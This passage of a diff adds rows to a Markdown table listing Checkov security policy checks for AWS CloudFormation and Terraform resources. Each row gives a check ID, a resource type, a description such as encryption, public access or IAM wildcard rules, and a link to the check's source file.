+| 194 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroup | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 195 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupEgress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 196 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupIngress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 197 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 198 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 199 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 200 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 201 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 202 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 203 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 204 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 205 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 206 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 207 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 208 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 209 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 210 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 211 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 212 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 213 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 214 | CKV_AWS_26 | resource | AWS::SNS::Topic | Ensure all data stored in the SNS topic is encrypted | Cloudformation | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SNSTopicEncryption.py) |
+| 215 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) |
+| 216 | CKV_AWS_27 | resource | AWS::SQS::Queue | Ensure all data stored in the SQS queue is encrypted | Cloudformation | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SQSQueueEncryption.py) |
+| 217 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) |
+| 218 | CKV_AWS_28 | resource | AWS::DynamoDB::Table | Ensure DynamoDB point in time recovery (backup) is enabled | Cloudformation | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbRecovery.py) |
+| 219 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) |
+| 220 | CKV_AWS_29 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Cloudformation | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) |
+| 221 | CKV_AWS_29 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) |
+| 222 | CKV_AWS_30 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) |
+| 223 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) |
+| 224 | CKV_AWS_31 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) |
+| 225 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) |
+| 226 | CKV_AWS_32 | resource | AWS::ECR::Repository | Ensure ECR policy is not set to public | Cloudformation | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRPolicy.py) |
+| 227 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) |
+| 228 | CKV_AWS_33 | resource | AWS::KMS::Key | Ensure KMS key policy does not contain wildcard (*) principal | Cloudformation | [KMSKeyWildCardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSKeyWildCardPrincipal.py) |
+| 229 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) |
+| 230 | CKV_AWS_34 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution ViewerProtocolPolicy is set to HTTPS | Cloudformation | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionEncryption.py) |
+| 231 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) |
+| 232 | CKV_AWS_35 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Cloudformation | [CloudtrailEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py) |
+| 233 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) |
+| 234 | CKV_AWS_36 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail log file validation is enabled | Cloudformation | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailLogValidation.py) |
+| 235 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) |
+| 236 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) |
+| 237 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) |
+| 238 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) |
+| 239 | CKV_AWS_40 | resource | AWS::IAM::Policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Cloudformation | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 240 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 241 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 242 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 243 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) |
+| 244 | CKV_AWS_41 | resource | serverless_aws | Ensure no hard coded AWS access key and secret key exists in provider | serverless | [AWSCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AWSCredentials.py) |
+| 245 | CKV_AWS_42 | resource | AWS::EFS::FileSystem | Ensure EFS is securely encrypted | Cloudformation | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py) |
+| 246 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) |
+| 247 | CKV_AWS_43 | resource | AWS::Kinesis::Stream | Ensure Kinesis Stream is securely encrypted | Cloudformation | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py) |
+| 248 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) |
+| 249 | CKV_AWS_44 | resource | AWS::Neptune::DBCluster | Ensure Neptune storage is securely encrypted | Cloudformation | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py) |
+| 250 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) |
+| 251 | CKV_AWS_45 | resource | AWS::Lambda::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) |
+| 252 | CKV_AWS_45 | resource | AWS::Serverless::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) |
+| 253 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) |
+| 254 | CKV_AWS_46 | resource | AWS::EC2::Instance | Ensure no hard-coded secrets exist in EC2 user data | Cloudformation | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2Credentials.py) |
+| 255 | CKV_AWS_46 | resource | aws_instance | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 256 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 257 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 258 | CKV_AWS_47 | resource | AWS::DAX::Cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Cloudformation | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DAXEncryption.py) |
+| 259 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) |
+| 260 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) |
+| 261 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) |
+| 262 | CKV_AWS_49 | resource | serverless_aws | Ensure no IAM policies documents allow "*" as a statement's actions | serverless | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/StarActionPolicyDocument.py) |
+| 263 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) |
+| 264 | CKV_AWS_51 | resource | AWS::ECR::Repository | Ensure ECR Image Tags are immutable | Cloudformation | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImmutableTags.py) |
+| 265 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) |
+| 266 | CKV_AWS_53 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public ACLs enabled | Cloudformation | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicACLs.py) |
+| 267 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) |
+| 268 | CKV_AWS_54 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public policy enabled | Cloudformation | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicPolicy.py) |
+| 269 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) |
+| 270 | CKV_AWS_55 | resource | AWS::S3::Bucket | Ensure S3 bucket has ignore public ACLs enabled | Cloudformation | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py) |
+| 271 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) |
+| 272 | CKV_AWS_56 | resource | AWS::S3::Bucket | Ensure S3 bucket has RestrictPublicBuckets enabled | Cloudformation | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3RestrictPublicBuckets.py) |
+| 273 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) |
+| 274 | CKV_AWS_57 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow WRITE permissions to everyone | Cloudformation | [S3PublicACLWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLWrite.py) |
+| 275 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
+| 276 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
+| 277 | CKV_AWS_58 | resource | AWS::EKS::Cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Cloudformation | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSSecretsEncryption.py) |
+| 278 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) |
+| 279 | CKV_AWS_59 | resource | AWS::ApiGateway::Method | Ensure there is no open access to back-end resources through API | Cloudformation | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py) |
+| 280 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) |
+| 281 | CKV_AWS_60 | resource | AWS::IAM::Role | Ensure IAM role allows only specific services or principals to assume it | Cloudformation | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py) |
+| 282 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) |
+| 283 | CKV_AWS_61 | resource | AWS::IAM::Role | Ensure AWS IAM policy does not allow assume role permission across all services | Cloudformation | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) |
+| 284 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) |
+| 285 | CKV_AWS_62 | resource | AWS::IAM::Group | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 286 | CKV_AWS_62 | resource | AWS::IAM::Policy | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 287 | CKV_AWS_62 | resource | AWS::IAM::Role | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 288 | CKV_AWS_62 | resource | AWS::IAM::User | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 289 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 290 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 291 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 292 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 293 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
+| 294 | CKV_AWS_63 | resource | AWS::IAM::Group | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 295 | CKV_AWS_63 | resource | AWS::IAM::Policy | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 296 | CKV_AWS_63 | resource | AWS::IAM::Role | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 297 | CKV_AWS_63 | resource | AWS::IAM::User | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 298 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
+| 299 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
